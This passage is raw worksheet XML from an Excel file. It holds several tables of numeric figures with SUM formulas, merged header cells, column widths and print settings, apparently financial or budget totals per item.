    <row r="8" spans="1:17" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="71">
        <f t="shared" si="1"/>
        <v>18000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18000</v>
      </c>
      <c r="N8" s="13">
        <v>0</v>
      </c>
      <c r="O8" s="13">
        <v>0</v>
      </c>
      <c r="P8" s="137">
        <v>18000</v>
      </c>
      <c r="Q8" s="1">
        <v>26010</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="71">
        <f t="shared" si="1"/>
        <v>66500</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="13"/>
      <c r="K9" s="13"/>
      <c r="L9" s="13">
        <v>8500</v>
      </c>
      <c r="M9" s="13">
        <v>58000</v>
      </c>
      <c r="N9" s="13"/>
      <c r="O9" s="13"/>
      <c r="P9" s="137">
        <v>66500</v>
      </c>
      <c r="Q9" s="1">
        <v>64400</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="71">
        <f>SUM(C10:O10)</f>
        <v>46500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>
        <v>46500</v>
      </c>
      <c r="N10" s="13"/>
      <c r="O10" s="13"/>
      <c r="P10" s="137">
        <v>46500</v>
      </c>
      <c r="Q10" s="1">
        <v>85000</v>
      </c>
    </row>
    <row r="11" spans="1:17" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="71">
        <f t="shared" si="1"/>
        <v>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7">
        <v>0</v>
      </c>
      <c r="Q11" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:17" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="71">
        <f t="shared" si="1"/>
        <v>25500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>
        <v>25500</v>
      </c>
      <c r="N12" s="13"/>
      <c r="O12" s="13"/>
      <c r="P12" s="137">
        <v>25500</v>
      </c>
      <c r="Q12" s="1">
        <v>20800</v>
      </c>
    </row>
    <row r="13" spans="1:17" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="71">
        <f t="shared" si="1"/>
        <v>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7">
        <v>0</v>
      </c>
      <c r="Q13" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:17" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="71">
        <f t="shared" si="1"/>
        <v>72402</v>
      </c>
      <c r="C14" s="94"/>
      <c r="D14" s="13"/>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="13"/>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="13"/>
      <c r="K14" s="13"/>
      <c r="L14" s="13"/>
      <c r="M14" s="13">
        <v>27402</v>
      </c>
      <c r="N14" s="13">
        <v>45000</v>
      </c>
      <c r="O14" s="13"/>
      <c r="P14" s="137">
        <v>72402</v>
      </c>
      <c r="Q14" s="1">
        <v>45000</v>
      </c>
    </row>
    <row r="15" spans="1:17" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="71">
        <f t="shared" si="1"/>
        <v>59300</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13"/>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="13"/>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="13"/>
      <c r="K15" s="13"/>
      <c r="L15" s="13">
        <v>7500</v>
      </c>
      <c r="M15" s="13">
        <v>15300</v>
      </c>
      <c r="N15" s="13">
        <v>36500</v>
      </c>
      <c r="O15" s="13"/>
      <c r="P15" s="137">
        <v>59300</v>
      </c>
      <c r="Q15" s="1">
        <v>58000</v>
      </c>
    </row>
    <row r="16" spans="1:17" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="71">
        <f t="shared" si="1"/>
        <v>17007</v>
      </c>
      <c r="C16" s="13">
        <v>7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17000</v>
      </c>
      <c r="N16" s="13">
        <v>0</v>
      </c>
      <c r="O16" s="13">
        <v>0</v>
      </c>
      <c r="P16" s="137">
        <v>17007</v>
      </c>
      <c r="Q16" s="1">
        <v>17502</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1"/>
    <row r="18" ht="22.5" customHeight="1"/>
    <row r="19" ht="22.5" customHeight="1"/>
    <row r="20" ht="22.5" customHeight="1"/>
    <row r="21" ht="22.5" customHeight="1"/>
    <row r="22" ht="22.5" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="4">
    <mergeCell ref="B3:O3"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="N2:O2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.1968503937007874" right="0.03937007874015748" top="0.7874015748031497" bottom="0.3937007874015748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7"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B1" sqref="B1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="22.5" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.125" style="1" customWidth="1"/>
    <col min="2" max="2" width="10.25390625" style="1" customWidth="1"/>
    <col min="3" max="3" width="10.75390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="11.00390625" style="1" customWidth="1"/>
    <col min="5" max="5" width="10.50390625" style="1" customWidth="1"/>
    <col min="6" max="6" width="10.25390625" style="1" customWidth="1"/>
    <col min="7" max="7" width="10.375" style="1" customWidth="1"/>
    <col min="8" max="8" width="9.25390625" style="1" customWidth="1"/>
    <col min="9" max="9" width="8.50390625" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.375" style="1" customWidth="1"/>
    <col min="11" max="12" width="10.50390625" style="1" customWidth="1"/>
    <col min="13" max="13" width="7.75390625" style="1" customWidth="1"/>
    <col min="14" max="14" width="10.75390625" style="1" customWidth="1"/>
    <col min="15" max="15" width="10.375" style="1" customWidth="1"/>
    <col min="16" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" ht="21" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>395</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="10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1" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5" t="s">
        <v>331</v>
      </c>
      <c r="N2" s="5"/>
    </row>
    <row r="3" spans="1:14" ht="20.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>179</v>
      </c>
      <c r="B3" s="179" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="179"/>
      <c r="D3" s="179"/>
      <c r="E3" s="179"/>
      <c r="F3" s="179"/>
      <c r="G3" s="179"/>
      <c r="H3" s="179"/>
      <c r="I3" s="179"/>
      <c r="J3" s="179"/>
      <c r="K3" s="179" t="s">
        <v>106</v>
      </c>
      <c r="L3" s="179"/>
      <c r="M3" s="179"/>
      <c r="N3" s="179"/>
    </row>
    <row r="4" spans="1:14" ht="21" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="179" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="179"/>
      <c r="D4" s="179"/>
      <c r="E4" s="179" t="s">
        <v>94</v>
      </c>
      <c r="F4" s="179"/>
      <c r="G4" s="179"/>
      <c r="H4" s="179" t="s">
        <v>95</v>
      </c>
      <c r="I4" s="179"/>
      <c r="J4" s="179"/>
      <c r="K4" s="179" t="s">
        <v>122</v>
      </c>
      <c r="L4" s="179" t="s">
        <v>98</v>
      </c>
      <c r="M4" s="179" t="s">
        <v>99</v>
      </c>
      <c r="N4" s="179" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="5" spans="1:14" ht="19.5" customHeight="1">
      <c r="A5" s="179"/>
      <c r="B5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="62" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="F5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="G5" s="62" t="s">
        <v>14</v>
      </c>
      <c r="H5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="I5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="J5" s="62" t="s">
        <v>14</v>
      </c>
      <c r="K5" s="182"/>
      <c r="L5" s="182"/>
      <c r="M5" s="182"/>
      <c r="N5" s="182"/>
    </row>
    <row r="6" spans="1:15" ht="18" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="68">
        <f aca="true" t="shared" si="0" ref="B6:N6">SUM(B7:B17)</f>
        <v>172300</v>
      </c>
      <c r="C6" s="68">
        <f t="shared" si="0"/>
        <v>146780</v>
      </c>
      <c r="D6" s="68">
        <f t="shared" si="0"/>
        <v>319080</v>
      </c>
      <c r="E6" s="68">
        <f t="shared" si="0"/>
        <v>172300</v>
      </c>
      <c r="F6" s="68">
        <f t="shared" si="0"/>
        <v>146780</v>
      </c>
      <c r="G6" s="68">
        <f t="shared" si="0"/>
        <v>319080</v>
      </c>
      <c r="H6" s="68">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I6" s="68">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J6" s="68">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K6" s="68">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L6" s="68">
        <f>SUM(L7:L17)</f>
        <v>319080</v>
      </c>
      <c r="M6" s="68">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N6" s="68">
        <f t="shared" si="0"/>
        <v>319080</v>
      </c>
      <c r="O6" s="17"/>
    </row>
    <row r="7" spans="1:15" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="109">
        <f>SUM(E7,H7)</f>
        <v>5635</v>
      </c>
      <c r="C7" s="109">
        <f>SUM(F7,I7)</f>
        <v>8236</v>
      </c>
      <c r="D7" s="109">
        <f>SUM(B7:C7)</f>
        <v>13871</v>
      </c>
      <c r="E7" s="13">
        <v>5635</v>
      </c>
      <c r="F7" s="13">
        <v>8236</v>
      </c>
      <c r="G7" s="110">
        <f>SUM(E7:F7)</f>
        <v>13871</v>
      </c>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="110">
        <f>SUM(H7:I7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="13"/>
      <c r="L7" s="13">
        <v>13871</v>
      </c>
      <c r="M7" s="13"/>
      <c r="N7" s="71">
        <f>SUM(K7:M7)</f>
        <v>13871</v>
      </c>
      <c r="O7" s="16"/>
    </row>
    <row r="8" spans="1:15" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="109">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(E8,H8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="109">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="109">
        <f>SUM(B8:C8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="110">
        <f aca="true" t="shared" si="3" ref="G8:G16">SUM(E8:F8)</f>
        <v>0</v>
      </c>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="110">
        <f aca="true" t="shared" si="4" ref="J8:J16">SUM(H8:I8)</f>
        <v>0</v>
      </c>
      <c r="K8" s="13"/>
      <c r="L8" s="13">
        <v>0</v>
      </c>
      <c r="M8" s="13"/>
      <c r="N8" s="71">
        <f aca="true" t="shared" si="5" ref="N8:N17">SUM(K8:M8)</f>
        <v>0</v>
      </c>
      <c r="O8" s="16"/>
    </row>
    <row r="9" spans="1:15" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="109">
        <f t="shared" si="1"/>
        <v>12600</v>
      </c>
      <c r="C9" s="109">
        <f t="shared" si="2"/>
        <v>5400</v>
      </c>
      <c r="D9" s="109">
        <f>SUM(B9:C9)</f>
        <v>18000</v>
      </c>
      <c r="E9" s="13">
        <v>12600</v>
      </c>
      <c r="F9" s="13">
        <v>5400</v>
      </c>
      <c r="G9" s="110">
        <f t="shared" si="3"/>
        <v>18000</v>
      </c>
      <c r="H9" s="13">
        <v>0</v>
      </c>
      <c r="I9" s="13">
        <v>0</v>
      </c>
      <c r="J9" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K9" s="13">
        <v>0</v>
      </c>
      <c r="L9" s="13">
        <v>18000</v>
      </c>
      <c r="M9" s="13">
        <v>0</v>
      </c>
      <c r="N9" s="71">
        <f t="shared" si="5"/>
        <v>18000</v>
      </c>
      <c r="O9" s="16"/>
    </row>
    <row r="10" spans="1:15" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="109">
        <f t="shared" si="1"/>
        <v>39235</v>
      </c>
      <c r="C10" s="109">
        <f t="shared" si="2"/>
        <v>27265</v>
      </c>
      <c r="D10" s="109">
        <f aca="true" t="shared" si="6" ref="D10:D17">SUM(B10:C10)</f>
        <v>66500</v>
      </c>
      <c r="E10" s="13">
        <v>39235</v>
      </c>
      <c r="F10" s="13">
        <v>27265</v>
      </c>
      <c r="G10" s="110">
        <f t="shared" si="3"/>
        <v>66500</v>
      </c>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13">
        <v>66500</v>
      </c>
      <c r="M10" s="13"/>
      <c r="N10" s="71">
        <f t="shared" si="5"/>
        <v>66500</v>
      </c>
      <c r="O10" s="16"/>
    </row>
    <row r="11" spans="1:15" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="109">
        <f>SUM(E11,H11)</f>
        <v>23500</v>
      </c>
      <c r="C11" s="109">
        <f t="shared" si="2"/>
        <v>23000</v>
      </c>
      <c r="D11" s="109">
        <f t="shared" si="6"/>
        <v>46500</v>
      </c>
      <c r="E11" s="13">
        <v>23500</v>
      </c>
      <c r="F11" s="13">
        <v>23000</v>
      </c>
      <c r="G11" s="110">
        <f t="shared" si="3"/>
        <v>46500</v>
      </c>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K11" s="13"/>
      <c r="L11" s="13">
        <v>46500</v>
      </c>
      <c r="M11" s="13"/>
      <c r="N11" s="71">
        <f t="shared" si="5"/>
        <v>46500</v>
      </c>
      <c r="O11" s="16"/>
    </row>
    <row r="12" spans="1:15" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="109">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="110">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K12" s="13"/>
      <c r="L12" s="13">
        <v>0</v>
      </c>
      <c r="M12" s="13"/>
      <c r="N12" s="71">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="O12" s="16"/>
    </row>
    <row r="13" spans="1:15" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="109">
        <f t="shared" si="1"/>
        <v>12750</v>
      </c>
      <c r="C13" s="109">
        <f t="shared" si="2"/>
        <v>12750</v>
      </c>
      <c r="D13" s="109">
        <f t="shared" si="6"/>
        <v>25500</v>
      </c>
      <c r="E13" s="13">
        <v>12750</v>
      </c>
      <c r="F13" s="13">
        <v>12750</v>
      </c>
      <c r="G13" s="110">
        <f t="shared" si="3"/>
        <v>25500</v>
      </c>
      <c r="H13" s="13">
        <v>0</v>
      </c>
      <c r="I13" s="13">
        <v>0</v>
      </c>
      <c r="J13" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K13" s="13">
        <v>0</v>
      </c>
      <c r="L13" s="13">
        <v>25500</v>
      </c>
      <c r="M13" s="13"/>
      <c r="N13" s="71">
        <f t="shared" si="5"/>
        <v>25500</v>
      </c>
      <c r="O13" s="16"/>
    </row>
    <row r="14" spans="1:15" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="109">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="109">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="109">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="110">
        <f>SUM(E14:F14)</f>
        <v>0</v>
      </c>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K14" s="13"/>
      <c r="L14" s="13">
        <v>0</v>
      </c>
      <c r="M14" s="13"/>
      <c r="N14" s="71">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="O14" s="46"/>
    </row>
    <row r="15" spans="1:15" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="109">
        <f t="shared" si="1"/>
        <v>38373</v>
      </c>
      <c r="C15" s="109">
        <f t="shared" si="2"/>
        <v>34029</v>
      </c>
      <c r="D15" s="109">
        <f>SUM(B15:C15)</f>
        <v>72402</v>
      </c>
      <c r="E15" s="13">
        <v>38373</v>
      </c>
      <c r="F15" s="13">
        <v>34029</v>
      </c>
      <c r="G15" s="110">
        <f t="shared" si="3"/>
        <v>72402</v>
      </c>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13">
        <v>72402</v>
      </c>
      <c r="M15" s="13"/>
      <c r="N15" s="71">
        <f t="shared" si="5"/>
        <v>72402</v>
      </c>
      <c r="O15" s="16"/>
    </row>
    <row r="16" spans="1:15" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="109">
        <f t="shared" si="1"/>
        <v>30200</v>
      </c>
      <c r="C16" s="109">
        <f t="shared" si="2"/>
        <v>29100</v>
      </c>
      <c r="D16" s="109">
        <f t="shared" si="6"/>
        <v>59300</v>
      </c>
      <c r="E16" s="13">
        <v>30200</v>
      </c>
      <c r="F16" s="13">
        <v>29100</v>
      </c>
      <c r="G16" s="110">
        <f t="shared" si="3"/>
        <v>59300</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="110">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K16" s="13"/>
      <c r="L16" s="13">
        <v>59300</v>
      </c>
      <c r="M16" s="13"/>
      <c r="N16" s="71">
        <f t="shared" si="5"/>
        <v>59300</v>
      </c>
      <c r="O16" s="16"/>
    </row>
    <row r="17" spans="1:15" ht="18" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="109">
        <f t="shared" si="1"/>
        <v>10007</v>
      </c>
      <c r="C17" s="109">
        <f t="shared" si="2"/>
        <v>7000</v>
      </c>
      <c r="D17" s="109">
        <f t="shared" si="6"/>
        <v>17007</v>
      </c>
      <c r="E17" s="13">
        <v>10007</v>
      </c>
      <c r="F17" s="13">
        <v>7000</v>
      </c>
      <c r="G17" s="110">
        <v>17007</v>
      </c>
      <c r="H17" s="13">
        <v>0</v>
      </c>
      <c r="I17" s="13">
        <v>0</v>
      </c>
      <c r="J17" s="110">
        <v>0</v>
      </c>
      <c r="K17" s="13">
        <v>0</v>
      </c>
      <c r="L17" s="13">
        <v>17007</v>
      </c>
      <c r="M17" s="13">
        <v>0</v>
      </c>
      <c r="N17" s="71">
        <f t="shared" si="5"/>
        <v>17007</v>
      </c>
      <c r="O17" s="16"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="10">
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="B3:J3"/>
    <mergeCell ref="K3:N3"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K4:K5"/>
    <mergeCell ref="L4:L5"/>
    <mergeCell ref="M4:M5"/>
    <mergeCell ref="N4:N5"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.4330708661417323" right="0.03937007874015748" top="0.5118110236220472" bottom="0.5511811023622047" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="landscape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pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="K7" sqref="K7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.375" style="0" customWidth="1"/>
    <col min="2" max="17" width="6.50390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" ht="14.25">
      <c r="A1" s="183" t="s">
        <v>396</v>
      </c>
      <c r="B1" s="184"/>
      <c r="C1" s="184"/>
      <c r="D1" s="184"/>
      <c r="E1" s="184"/>
      <c r="F1" s="18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">
        <v>338</v>
      </c>
      <c r="Q2" s="15"/>
    </row>
    <row r="3" spans="1:17" ht="18.75" customHeight="1">
      <c r="A3" s="178" t="s">
        <v>219</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>209</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168" t="s">
        <v>210</v>
      </c>
      <c r="K3" s="168"/>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
      <c r="N3" s="168"/>
      <c r="O3" s="168"/>
      <c r="P3" s="168"/>
      <c r="Q3" s="168"/>
    </row>
    <row r="4" spans="1:17" ht="18.75" customHeight="1">
      <c r="A4" s="178"/>
      <c r="B4" s="50" t="s">
        <v>211</v>
      </c>
      <c r="C4" s="51" t="s">
        <v>212</v>
      </c>
      <c r="D4" s="51" t="s">
        <v>213</v>
      </c>
      <c r="E4" s="51" t="s">
        <v>214</v>
      </c>
      <c r="F4" s="51" t="s">
        <v>215</v>
      </c>
      <c r="G4" s="51" t="s">
        <v>216</v>
      </c>
      <c r="H4" s="51" t="s">
        <v>217</v>
      </c>
      <c r="I4" s="51" t="s">
        <v>218</v>
      </c>
      <c r="J4" s="50" t="s">
        <v>211</v>
      </c>
      <c r="K4" s="51" t="s">
        <v>212</v>
      </c>
      <c r="L4" s="51" t="s">
        <v>213</v>
      </c>
      <c r="M4" s="51" t="s">
        <v>214</v>
      </c>
      <c r="N4" s="51" t="s">
        <v>215</v>
      </c>
      <c r="O4" s="51" t="s">
        <v>216</v>
      </c>
      <c r="P4" s="51" t="s">
        <v>217</v>
      </c>
      <c r="Q4" s="51" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="15.75" customHeight="1">
      <c r="A5" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="53">
        <f aca="true" t="shared" si="0" ref="B5:Q5">SUM(B6:B16)</f>
        <v>2</v>
      </c>
      <c r="C5" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="K5" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="L5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="O5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:17" ht="15.75" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="82">
        <f>SUM(C6:I6)</f>
        <v>2</v>
      </c>
      <c r="C6" s="23">
        <v>2</v>
      </c>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23"/>
      <c r="J6" s="82">
        <f>SUM(K6:Q6)</f>
        <v>4</v>
      </c>
      <c r="K6" s="23">
        <v>4</v>
      </c>
      <c r="L6" s="23"/>
      <c r="M6" s="23"/>
      <c r="N6" s="23"/>
      <c r="O6" s="23"/>
      <c r="P6" s="23"/>
      <c r="Q6" s="23"/>
    </row>
    <row r="7" spans="1:17" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="82">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:I7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="23"/>
      <c r="D7" s="23"/>
      <c r="E7" s="23"/>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="82">
        <f>SUM(K7:Q7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="23"/>
      <c r="L7" s="23"/>
      <c r="M7" s="23"/>
      <c r="N7" s="23"/>
      <c r="O7" s="23"/>
      <c r="P7" s="23"/>
      <c r="Q7" s="23"/>
    </row>
    <row r="8" spans="1:17" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="82">
        <f aca="true" t="shared" si="2" ref="J8:J16">SUM(K8:Q8)</f>
        <v>0</v>
      </c>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="23"/>
      <c r="Q8" s="23"/>
    </row>
    <row r="9" spans="1:17" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="82">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="23"/>
      <c r="N9" s="23"/>
      <c r="O9" s="23"/>
      <c r="P9" s="23"/>
      <c r="Q9" s="23"/>
    </row>
    <row r="10" spans="1:17" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
